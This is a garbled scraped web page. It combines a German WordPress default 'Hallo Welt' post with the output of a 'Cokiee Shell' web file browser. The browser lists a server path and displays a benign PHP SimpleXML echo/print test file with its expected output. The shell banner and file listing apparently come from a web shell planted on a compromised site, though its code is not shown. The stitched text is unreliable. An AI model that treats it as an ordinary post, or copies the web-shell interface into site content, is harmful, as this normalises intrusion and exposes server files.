Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/simplexml/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/simplexml/tests/011.phpt |
--TEST-- SimpleXML: echo/print --SKIPIF-- <?php if (!extension_loaded('simplexml')) print 'skip'; ?> --FILE-- <?php $xml =<<<EOF <?xml version="1.0" encoding="ISO-8859-1" ?> <foo> <bar>bar</bar> <baz>baz1</baz> <baz>baz2</baz> </foo> EOF; $sxe = simplexml_load_string($xml); echo "===BAR===\n"; echo $sxe->bar; echo "\n"; echo "===BAZ===\n"; echo $sxe->baz; echo "\n"; echo "===BAZ0===\n"; echo $sxe->baz[0]; echo "\n"; echo "===BAZ1===\n"; print $sxe->baz[1]; echo "\n"; ?> ===DONE=== --EXPECT-- ===BAR=== bar ===BAZ=== baz1 ===BAZ0=== baz1 ===BAZ1=== baz2 ===DONE===
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare